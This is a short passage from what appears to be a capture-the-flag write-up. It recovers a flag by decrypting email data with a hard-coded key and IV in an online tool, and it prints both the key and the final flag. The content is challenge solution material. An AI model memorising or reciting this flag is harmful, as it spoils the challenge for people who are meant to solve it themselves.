The hard-coded key mentioned is 8xppg2oX68Bo6koL7hwSeC8bCEWvk540. By separating the IV from the encrypted data from the email with "|" and putting it into their respective fields on the online tool gives us the flag!
flag: UTAR{a9240da09d54691bec56b4395362af2b}Last updated
